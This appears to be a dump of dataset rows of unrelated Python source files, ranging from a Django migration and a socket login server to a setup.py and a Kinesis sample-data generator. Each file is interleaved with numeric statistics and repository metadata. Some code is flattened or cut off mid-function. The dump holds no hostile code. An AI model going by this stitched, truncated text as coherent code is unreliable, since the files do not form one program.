from lesson14_projects.pen.data.const import ( A, E_A, E_AN, E_IS, E_OVER, E_PEN, E_PIN, E_THAT, E_THIS, E_WAS, INIT, IS, PEN, THIS, ) pen_transition_doc_v19 = { "title": "This is a pen", "entry_state": INIT, "data": { INIT: { E_OVER: [INIT], E_THAT: [INIT], E_THIS: [INIT, THIS], THIS: { E_OVER: [INIT], E_WAS: [INIT], E_IS: [INIT, THIS, IS], IS: { E_OVER: [INIT], E_AN: [INIT], E_A: [INIT, THIS, IS, A], A: { E_OVER: [INIT], E_PIN: [INIT], E_PEN: [PEN], }, }, }, }, PEN: { E_OVER: None, }, }, }
19.702128
46
0.327214
93
926
2.967742
0.258065
0.163043
0.130435
0.144928
0
0
0
0
0
0
0
0.009592
0.549676
926
46
47
20.130435
0.652278
0
0
0.088889
0
0
0.035637
0
0
0
0
0
0
1
0
false
0
0.022222
0
0.022222
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de3cc8b6cc08416f6501e8a2abc20d6706d9dfa
1,037
py
Python
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from .Alarm.alarm import Alarm from .DeliveryView.bolus import Bolus from .DeliveryView.info import Info from .DeliveryView.infusion import Infusion from .DeliveryView.infusion_parameter import InfusionParameter from .DeliveryView.priming import Priming from .HardwareControl.motor import Motor from .MenuSettings.device_report import DeviceReport from .MenuSettings.history_log import HistoryLog from .MenuSettings.infusion_setting import InfusionSetting from .MenuSettings.maintenance import Maintenance from .MenuSettings.safety_setting import SafetySetting from .MenuSettings.system_setting import SystemSetting from .SensorControl.sensor import Sensor __all__ = ["Alarm", "Bolus", "Info", "Infusion", "InfusionParameter", "Priming", "Motor", "DeviceReport", "HistoryLog", "InfusionSetting", "Maintenance", "SafetySetting", "SystemSetting", "Sensor", ]
31.424242
62
0.695275
94
1,037
7.56383
0.340426
0.135021
0.067511
0
0
0
0
0
0
0
0
0.001245
0.225651
1,037
32
63
32.40625
0.884184
0.020251
0
0
0
0
0.129191
0
0
0
0
0
0
1
0
false
0
0.482759
0
0.482759
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5de3f2eb79030c2d37fe6eb8becce065096245d7
1,656
py
Python
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
7
2021-05-12T01:52:09.000Z
2021-12-22T17:22:14.000Z
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
5
2021-04-16T21:27:44.000Z
2021-04-26T03:17:44.000Z
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
null
null
null
# --------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # --------------------------------------------------------- class DashboardInfo: MODEL_ID_KEY = "id" # To match Model schema MODEL_INFO_FILENAME = "model_info.json" RAI_INSIGHTS_MODEL_ID_KEY = "model_id" RAI_INSIGHTS_RUN_ID_KEY = "rai_insights_parent_run_id" RAI_INSIGHTS_PARENT_FILENAME = "rai_insights.json" class PropertyKeyValues: # The property to indicate the type of Run RAI_INSIGHTS_TYPE_KEY = "_azureml.responsibleai.rai_insights.type" RAI_INSIGHTS_TYPE_CONSTRUCT = "construction" RAI_INSIGHTS_TYPE_CAUSAL = "causal" RAI_INSIGHTS_TYPE_COUNTERFACTUAL = "counterfactual" RAI_INSIGHTS_TYPE_EXPLANATION = "explanation" RAI_INSIGHTS_TYPE_ERROR_ANALYSIS = "error_analysis" RAI_INSIGHTS_TYPE_GATHER = "gather" # Property to point at the model under examination RAI_INSIGHTS_MODEL_ID_KEY = "_azureml.responsibleai.rai_insights.model_id" # Property for tool runs to point at their constructor run RAI_INSIGHTS_CONSTRUCTOR_RUN_ID_KEY = ( "_azureml.responsibleai.rai_insights.constructor_run" ) # Property to record responsibleai version RAI_INSIGHTS_RESPONSIBLEAI_VERSION_KEY = ( "_azureml.responsibleai.rai_insights.responsibleai_version" ) # Property format to indicate presence of a tool RAI_INSIGHTS_TOOL_KEY_FORMAT = "_azureml.responsibleai.rai_insights.has_{0}" class RAIToolType: CAUSAL = "causal" COUNTERFACTUAL = "counterfactual" ERROR_ANALYSIS = "error_analysis" EXPLANATION = "explanation"
35.234043
80
0.710145
186
1,656
5.903226
0.295699
0.210383
0.10929
0.141166
0.161202
0.065574
0
0
0
0
0
0.00072
0.161232
1,656
46
81
36
0.789777
0.259662
0
0
0
0
0.337993
0.214638
0
0
0
0
0
1
0
false
0
0
0
0.851852
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de7e5e6d54e182aae7ef185c563685a2425fd3b
1,211
py
Python
request_token/migrations/0009_requesttokenerror.py
alex-hutton/django-request-token
299c4cb22ce3012c7ef995a648e5b1ea6b8a84d7
[ "MIT" ]
null
null
null
request_token/migrations/0009_requesttokenerror.py
alex-hutton/django-request-token
299c4cb22ce3012c7ef995a648e5b1ea6b8a84d7
[ "MIT" ]
2
2019-11-13T22:22:41.000Z
2019-12-02T22:19:56.000Z
request_token/migrations/0009_requesttokenerror.py
hongquan/django-request-token
76a5f8fce268ff252900341c7dcd7e7d442effe1
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.10 on 2017-05-21 19:33 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('request_token', '0008_convert_token_data_to_jsonfield'), ] operations = [ migrations.CreateModel( name='RequestTokenErrorLog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('error_type', models.CharField(help_text='The underlying type of error raised.', max_length=50)), ('error_message', models.CharField(help_text='The error message supplied.', max_length=200)), ('log', models.OneToOneField(help_text='The token use against which the error occurred.', on_delete=django.db.models.deletion.CASCADE, related_name='error', to='request_token.RequestTokenLog')), ('token', models.ForeignKey(help_text='The RequestToken that was used.', on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='request_token.RequestToken')), ], ), ]
44.851852
210
0.673823
142
1,211
5.549296
0.556338
0.040609
0.055838
0.083756
0.187817
0.121827
0.121827
0.121827
0.121827
0
0
0.0258
0.199835
1,211
26
211
46.576923
0.78741
0.0545
0
0
1
0
0.272329
0.079685
0
0
0
0
0
1
0
false
0
0.157895
0
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de8ea4c838b0533ab68d0c0085a12cb95b9a807
896
py
Python
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
1
2020-03-28T14:54:28.000Z
2020-03-28T14:54:28.000Z
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
null
null
null
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
null
null
null
import typing from .core import Component _Controller = typing.TypeVar('_Controller') _ControllerType = typing.Type[_Controller] ControllerFactory = typing.NewType('ControllerFactory', typing.Callable[[typing.Type], object]) _controller_factory: typing.Optional[ControllerFactory] = None def controller(controller_class: _ControllerType) -> _ControllerType: Component.register(controller_class) return controller_class def set_controller_factory(controller_factory: ControllerFactory) -> None: global _controller_factory _controller_factory = controller_factory def build_controller(controller_class: _ControllerType) -> _Controller: if _controller_factory is None: return controller_class() return _controller_factory(controller_class) def get_component(controller_class: _ControllerType) -> Component: return Component.get_by_cls(controller_class)
30.896552
95
0.809152
91
896
7.582418
0.307692
0.197101
0.156522
0.147826
0
0
0
0
0
0
0
0
0.117188
896
28
96
32
0.872314
0
0
0
0
0
0.03125
0
0
0
0
0
0
1
0.222222
false
0
0.111111
0.055556
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5deb5f7aaf6a1389fadf9c9089ff41e73863dbba
952
py
Python
libact/query_strategies/tests/test_variance_reduction.py
joequant/libact
4fbf4d59fd0d4e23858b264de2f35f674c50445b
[ "BSD-2-Clause" ]
1
2019-05-09T13:00:45.000Z
2019-05-09T13:00:45.000Z
libact/query_strategies/tests/test_variance_reduction.py
DunZhang/libact
e37e9ed6c36febe701d84b2d495c958ab02f0bc8
[ "BSD-2-Clause" ]
null
null
null
libact/query_strategies/tests/test_variance_reduction.py
DunZhang/libact
e37e9ed6c36febe701d84b2d495c958ab02f0bc8
[ "BSD-2-Clause" ]
1
2021-01-18T20:07:57.000Z
2021-01-18T20:07:57.000Z
import unittest from numpy.testing import assert_array_equal import numpy as np from libact.base.dataset import Dataset from libact.models import LogisticRegression from libact.query_strategies import VarianceReduction from .utils import run_qs class VarianceReductionTestCase(unittest.TestCase): """Variance reduction test case using artifitial dataset""" def setUp(self): self.X = [[-2, -1], [1, 1], [-1, -2], [-1, -1], [1, 2], [2, 1]] self.y = [0, 1, 0, 1, 0, 1] self.quota = 4 def test_variance_reduction(self): trn_ds = Dataset(self.X, np.concatenate([self.y[:2], [None] * (len(self.y) - 2)])) qs = VarianceReduction(trn_ds, model=LogisticRegression(), sigma=0.1) qseq = run_qs(trn_ds, qs, self.y, self.quota) assert_array_equal(qseq, np.array([4, 5, 2, 3])) if __name__ == '__main__': unittest.main()
31.733333
77
0.615546
128
952
4.421875
0.414063
0.017668
0.015901
0.014134
0
0
0
0
0
0
0
0.037868
0.25105
952
29
78
32.827586
0.755961
0.055672
0
0
0
0
0.008959
0
0
0
0
0
0.095238
1
0.095238
false
0
0.333333
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5df2f0f840a2ef6d66c1e525c680fc2bedf30ceb
487
py
Python
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
1
2019-04-29T17:43:22.000Z
2019-04-29T17:43:22.000Z
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
null
null
null
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
null
null
null
import os import shutil import requests def get_cat(folder, name): url = "http://consuming-python-services-api.azurewebsites.net/cats/random" data = get_data_from_url(url) save_image(folder, name, data) def get_data_from_url(url): response = requests.get(url, stream=True) return response.raw def save_image(folder, name, data): file_name = os.path.join(folder, name + '.jpg') with open(file_name, 'wb') as fout: shutil.copyfileobj(data, fout)
22.136364
78
0.702259
72
487
4.597222
0.527778
0.120846
0.066465
0.084592
0.241692
0
0
0
0
0
0
0
0.176591
487
21
79
23.190476
0.825436
0
0
0
0
0
0.147844
0
0
0
0
0
0
1
0.214286
false
0
0.214286
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5df431be7adb55ae6ec852df04ddc2566bd34906
2,411
py
Python
src/charma/media_info/manager.py
mononobi/charma-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
1
2020-01-16T23:36:10.000Z
2020-01-16T23:36:10.000Z
src/charma/media_info/manager.py
mononobi/imovie-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
24
2020-06-08T18:27:04.000Z
2021-06-06T12:01:39.000Z
src/charma/media_info/manager.py
mononobi/charma-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
1
2020-12-20T05:29:04.000Z
2020-12-20T05:29:04.000Z
# -*- coding: utf-8 -*- """ media info manager module. """ from pyrin.core.mixin import HookMixin from pyrin.core.structs import Manager import pyrin.utils.path as path_utils from charma.media_info import MediaInfoPackage from charma.media_info.interface import AbstractMediaInfoProvider from charma.media_info.exceptions import InvalidMediaInfoProviderTypeError class MediaInfoManager(Manager, HookMixin): """ media info manager class. """ package_class = MediaInfoPackage hook_type = AbstractMediaInfoProvider invalid_hook_type_error = InvalidMediaInfoProviderTypeError REQUIRED_INFO = ('runtime', 'width', 'height') def _is_complete(self, info): """ gets a value indicating that given media info is complete. :param dict info: media info to be checked. :rtype: bool """ for item in self.REQUIRED_INFO: result = info.get(item) if result is None or result <= 0: return False return True def register_provider(self, instance): """ registers the given instance into media info providers. :param AbstractMediaInfoProvider instance: media info provider instance to be registered. :raises InvalidMediaInfoProviderTypeError: invalid media info provider type error. """ self.register_hook(instance) def get_info(self, file, **options): """ gets a dict containing media info of given file. :param str file: absolute path of video file. :raises InvalidPathError: invalid path error. :raises PathIsNotAbsoluteError: path is not absolute error. :raises PathNotExistedError: path not existed error. :raises IsNotFileError: is not directory error. :returns: dict(int runtime, int width, int height) :rtype: dict """ path_utils.assert_is_file(file) result = dict() for provider in self._get_hooks(): current_result = provider.get_info(file, **options) result.update(current_result) if self._is_complete(result) is True: break result.setdefault('runtime', 0) result.setdefault('width', 0) result.setdefault('height', 0) return result
28.702381
90
0.633762
255
2,411
5.890196
0.368627
0.065912
0.02996
0.037949
0
0
0
0
0
0
0
0.002934
0.293239
2,411
83
91
29.048193
0.878521
0.359602
0
0
0
0
0.026866
0
0
0
0
0
0.032258
1
0.096774
false
0
0.193548
0
0.548387
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5dfa81c4561263d9017352c96e5be1e9f43f9cf3
2,220
py
Python
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
Assignment-1/Code/server3.py
pankajk22/Computer-Networks-Assignments
5c227ef59c31ab52cde160568242dbbc84482bc5
[ "MIT" ]
null
null
null
import socket import csv import traceback import threading s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) usrpass={} def openfile(): filename="login_credentials.csv" with open(filename,'r')as csvfile: csv_file = csv.reader(csvfile, delimiter=",") for col in csv_file: usrpass[col[0]]=col[1] usrpass.pop("Username") #print(usrpass) ihost=socket.gethostname() host=socket.gethostbyname(ihost) ihost=socket.gethostname() host=socket.gethostbyname(ihost) iport=[] hostfile="host.csv" with open(hostfile,'r')as host_file: csv_hfile = csv.reader(host_file, delimiter=",") for row in csv_hfile: iport.append(row[1]) port=int(iport[4]) def socketbind(): try: s.bind(('',port)) print("Bind with host at port number : "+str(port)) s.listen(10) print("Socket is listening!!") except socket.error as msg: print("Error in Binding: "+ str(msg)+"\n Retrying....") socketbind() def socketaccept(): conn,add=s.accept() print("connection is established with IP : "+str(add[0])+" and Port Number : "+str(add[1])) conn.send(bytes("1","utf-8")) conversation(conn) conn.close() def conversation(conn): while True: username=str(conn.recv(1024),"utf-8") password=str(conn.recv(1024),"utf-8") res=checkpass(username,password) if res==1: print("Valid Password!") conn.send(bytes("1","utf-8")) conn.send(bytes("1","utf-8")) else: conn.send(bytes("-1","utf-8")) conn.send(bytes("-1","utf-8")) # def checkusr(username): # if username in usrpass: # return 1 # else: # print("Invalid Username") # return -1 def checkpass(username,password): if usrpass[username]==password: return 1 else: print("Invalid Password") return -1 def main(): openfile() socketbind() socketaccept() # count=0 # while (count<6): # new_thread=threading.Thread(target =socketaccept) # new_thread.start() # count=count+1 main()
23.368421
95
0.578378
271
2,220
4.697417
0.346863
0.021995
0.05106
0.054988
0.21524
0.179104
0.135114
0.056559
0.056559
0.056559
0
0.02225
0.271171
2,220
95
96
23.368421
0.764524
0.119369
0
0.209677
0
0
0.131173
0.010802
0
0
0
0
0
1
0.096774
false
0.145161
0.064516
0
0.193548
0.096774
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
b908698cf79967eaadf3686141afa64182f22f9d
4,756
py
Python
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
setup.py
UdoGi/dark-matter
3d49e89fa5e81f83144119f6216c5774176d203b
[ "MIT" ]
null
null
null
#!/usr/bin/env python from setuptools import setup # Modified from http://stackoverflow.com/questions/2058802/ # how-can-i-get-the-version-defined-in-setup-py-setuptools-in-my-package def version(): import os import re init = os.path.join('dark', '__init__.py') with open(init) as fp: initData = fp.read() match = re.search(r"^__version__ = ['\"]([^'\"]+)['\"]", initData, re.M) if match: return match.group(1) else: raise RuntimeError('Unable to find version string in %r.' % init) # Explicitly list bin scripts to be installed, seeing as I have a few local # bin files that are not (yet) part of the distribution. scripts = [ 'bin/aa-info.py', 'bin/aa-to-dna.py', 'bin/aa-to-properties.py', 'bin/adaptor-distances.py', 'bin/alignment-panel-civ.py', 'bin/alignments-per-read.py', 'bin/bit-score-to-e-value.py', 'bin/cat-json-blast-records.py', 'bin/check-fasta-json-blast-consistency.py', 'bin/codon-distance.py', 'bin/compare-consensuses.py', 'bin/compare-sequences.py', 'bin/convert-blast-xml-to-json.py', 'bin/convert-diamond-to-json.py', 'bin/convert-diamond-to-sam.py', 'bin/convert-sam-to-fastq.sh', 'bin/create-newick-relabeling-output.py', 'bin/dark-matter-version.py', 'bin/describe-protein-database.py', 'bin/dna-to-aa.py', 'bin/download-genbank.sh', 'bin/e-value-to-bit-score.py', 'bin/extract-ORFs.py', 'bin/fasta-base-indices.py', 'bin/fasta-count.py', 'bin/fasta-diff.sh', 'bin/fasta-identity-table.py', 'bin/fasta-ids.py', 'bin/fasta-join.py', 'bin/fasta-lengths.py', 'bin/fasta-sequences.py', 'bin/fasta-sort.py', 'bin/fasta-split-by-id.py', 'bin/fasta-subset.py', 'bin/fasta-subtraction.py', 'bin/fasta-to-phylip.py', 'bin/fasta-variable-sites.py', 'bin/filter-fasta-by-complexity.py', 'bin/filter-fasta-by-taxonomy.py', 'bin/filter-fasta.py', 'bin/filter-hits-to-fasta.py', 'bin/filter-reads-alignments.py', 'bin/filter-sam.py', 'bin/find-hits.py', 'bin/format-fasta.py', 'bin/genome-protein-summary.py', 'bin/get-features.py', 'bin/get-hosts.py', 'bin/get-reads.py', 'bin/get-taxonomy.py', 'bin/graph-evalues.py', 'bin/local-align.py', 'bin/make-consensus.py', 'bin/make-fasta-database.py', 'bin/make-protein-database.py', 'bin/ncbi-fetch-id.py', 'bin/newick-to-ascii.py', 'bin/noninteractive-alignment-panel.py', 'bin/parse-genbank-flat-file.py', 'bin/position-summary.py', 'bin/pre-commit.sh', 'bin/print-blast-xml-for-derek.py', 'bin/print-blast-xml.py', 'bin/print-read-lengths.py', 'bin/proteins-to-pathogens.py', 'bin/proteins-to-pathogens-civ.py', 'bin/randomize-fasta.py', 'bin/read-blast-json.py', 'bin/read-blast-xml.py', 'bin/relabel-newick-tree.py', 'bin/run-bwa.py', 'bin/run-bowtie2.py', 'bin/sam-coverage.py', 'bin/sam-coverage-depth.py', 'bin/sam-to-fasta-alignment.py', 'bin/sam-reference-read-counts.py', 'bin/sam-references.py', 'bin/sff-to-fastq.py', 'bin/split-fasta-by-adaptors.py', 'bin/subset-protein-database.py', 'bin/summarize-fasta-bases.py', 'bin/summarize-reads.py', 'bin/trim-primers.py', 'bin/trim-reads.py', 'bin/write-htcondor-job-spec.py', ] setup(name='dark-matter', version=version(), packages=['dark', 'dark.blast', 'dark.diamond', 'dark.civ'], url='https://github.com/acorg/dark-matter', download_url='https://github.com/acorg/dark-matter', author='Terry Jones, Barbara Muehlemann, Tali Veith, Sophie Mathias', author_email='tcj25@cam.ac.uk', keywords=['virus discovery'], classifiers=[ 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Topic :: Software Development :: Libraries :: Python Modules', ], license='MIT', description='Python classes for working with genetic sequence data', scripts=scripts, install_requires=[ 'biopython>=1.71', 'bz2file>=0.98', 'Cython>=0.29.16', 'ipython>=3.1.0', 'matplotlib>=1.4.3', 'mysql-connector-python==8.0.11', 'numpy>=1.14.2', 'pysam>=0.15.2', 'pyfaidx>=0.4.8.4', 'pyzmq>=14.3.1', 'requests>=2.18.4', 'cachetools>=3.1.0', 'simplejson>=3.5.3', 'six>=1.11.0', ])
31.919463
75
0.603238
664
4,756
4.304217
0.399096
0.139958
0.045486
0.020994
0.069979
0.040588
0.040588
0
0
0
0
0.017701
0.204163
4,756
148
76
32.135135
0.737384
0.058452
0
0
0
0
0.637156
0.345629
0
0
0
0
0
1
0.007353
false
0
0.022059
0
0.036765
0.022059
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
b9093a206a1a67140ea6cc8087c03166f895cb37
1,732
py
Python
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
authenticationApp/templatetags/timetags.py
FilipBali/VirtualPortfolio-WebApplication
9236509205e37c2c682b7b2f518f5794a94fd178
[ "MIT" ]
null
null
null
# ====================================================================================================================== # Fakulta informacnich technologii VUT v Brne # Bachelor thesis # Author: Filip Bali (xbalif00) # License: MIT # ====================================================================================================================== from django import template import datetime import time from portfolioApp.models import NotificationEvent register = template.Library() import pandas as pd def print_timestamp(timestamp): return time.strftime('%Y-%m-%d'.format(timestamp%1000), time.gmtime(timestamp/1000.0)) def print_timestamp_analysis(timestamp): return str(timestamp.year) + '-' + str(timestamp.month) +'-' + str(timestamp.day) def print_timestamp_notifications(timestamp): return str(timestamp.year) + '-' + str(timestamp.month) +'-' + str(timestamp.day) def print_notification_text(type): if type == 1: return 'At a price change equal/above/below' elif type == 2: return 'Percentage increase current price' elif type == 3: return 'Percentage decrease current price' def print_symbol_notifications(notification_id): object = NotificationEvent.objects.get(id=notification_id) symbol = str(object.company.symbol) return symbol def print_type_notifications(notification_type): if notification_type == 1: return 'Interday' elif notification_type == 2: return 'Intraday' register.filter(print_timestamp) register.filter(print_timestamp_analysis) register.filter(print_timestamp_notifications) register.filter(print_notification_text) register.filter(print_symbol_notifications) register.filter(print_type_notifications)
34.64
120
0.65127
181
1,732
6.082873
0.40884
0.043597
0.103542
0.076294
0.128974
0.128974
0.128974
0.128974
0.128974
0.128974
0
0.010589
0.127598
1,732
50
121
34.64
0.718068
0.196305
0
0.058824
0
0
0.093074
0
0
0
0
0
0
1
0.176471
false
0
0.147059
0.088235
0.588235
0.352941
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
b90f4e751b3217015ecc06286993d45ab12fc397
405
py
Python
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
{{ cookiecutter.repo_name }}/tests/test_environment.py
FrancisMudavanhu/cookiecutter-data-science
be766817a7399ccd714bf03d085609985fa7313a
[ "MIT" ]
null
null
null
import sys REQUIRED_PYTHON = "python3" required_major = 3 def main(): system_major = sys.version_info.major if system_major != required_major: raise TypeError( f"This project requires Python {required_major}." f" Found: Python {sys.version}") else: print(">>> Development environment passes all tests!") if __name__ == '__main__': main()
19.285714
62
0.632099
46
405
5.23913
0.608696
0.161826
0
0
0
0
0
0
0
0
0
0.006711
0.264198
405
20
63
20.25
0.802013
0
0
0
0
0
0.330864
0
0
0
0
0
0
1
0.076923
false
0.076923
0.076923
0
0.153846
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
b90f54d52259df5370c156bb89c17f8368958017
1,845
py
Python
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
5
2021-08-13T09:20:58.000Z
2021-12-16T22:13:54.000Z
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
documents/aws-doc-sdk-examples/python/example_code/kda/kda-python-datagenerator-stockticker.py
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
# snippet-comment:[These are tags for the AWS doc team's sample catalog. Do not remove.] # snippet-sourcedescription:[kda-python-datagenerator-stockticker.py demonstrates how to generate sample data for Amazon Kinesis Data Analytics SQL applications.] # snippet-service:[kinesisanalytics] # snippet-keyword:[Python] # snippet-sourcesyntax:[python] # snippet-sourcesyntax:[python] # snippet-keyword:[Amazon Kinesis Data Analytics] # snippet-keyword:[Code Sample] # snippet-sourcetype:[full-example] # snippet-sourcedate:[2019-01-29] # snippet-sourceauthor:[fletpatr (AWS)] # Copyright 2010-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # This file is licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. # snippet-start:[kinesisanalytics.python.datagenerator.stockticker] import json import boto3 import random import datetime kinesis = boto3.client('kinesis') def getReferrer(): data = {} now = datetime.datetime.now() str_now = now.isoformat() data['EVENT_TIME'] = str_now data['TICKER'] = random.choice(['AAPL', 'AMZN', 'MSFT', 'INTC', 'TBV']) price = random.random() * 100 data['PRICE'] = round(price, 2) return data while True: data = json.dumps(getReferrer()) print(data) kinesis.put_record( StreamName="ExampleInputStream", Data=data, PartitionKey="partitionkey") # snippet-end:[kinesisanalytics.python.datagenerator.stockticker]
34.811321
162
0.720325
233
1,845
5.686695
0.579399
0.037736
0.067925
0.039245
0.047547
0
0
0
0
0
0
0.016927
0.16748
1,845
52
163
35.480769
0.845703
0.642276
0
0
1
0
0.121643
0
0
0
0
0
0
1
0.047619
false
0
0.190476
0
0.285714
0.047619
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
f8d46f993d25bd7f9f34660f23bf18928f5a3963
5,672
py
Python
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
1
2022-01-03T14:00:17.000Z
2022-01-03T14:00:17.000Z
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
null
null
null
module/classification_package/src/utils.py
fishial/Object-Detection-Model
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
[ "CC0-1.0" ]
1
2021-12-21T09:50:53.000Z
2021-12-21T09:50:53.000Z
import numpy as np import logging import numbers import torch import math import json import sys from torch.optim.lr_scheduler import LambdaLR from torchvision.transforms.functional import pad class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count class ConstantLRSchedule(LambdaLR): """ Constant learning rate schedule. """ def __init__(self, optimizer, last_epoch=-1): super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch) class WarmupConstantSchedule(LambdaLR): """ Linear warmup and then constant. Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps. Keeps learning rate schedule equal to 1. after warmup_steps. """ def __init__(self, optimizer, warmup_steps, 